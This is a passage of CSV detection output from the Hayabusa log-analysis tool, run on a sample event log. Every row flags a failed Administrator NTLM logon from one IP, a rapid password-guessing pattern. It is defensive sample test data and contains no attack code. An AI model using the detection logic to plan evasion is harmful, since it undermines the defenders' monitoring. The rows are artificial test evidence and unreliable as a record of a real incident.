NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
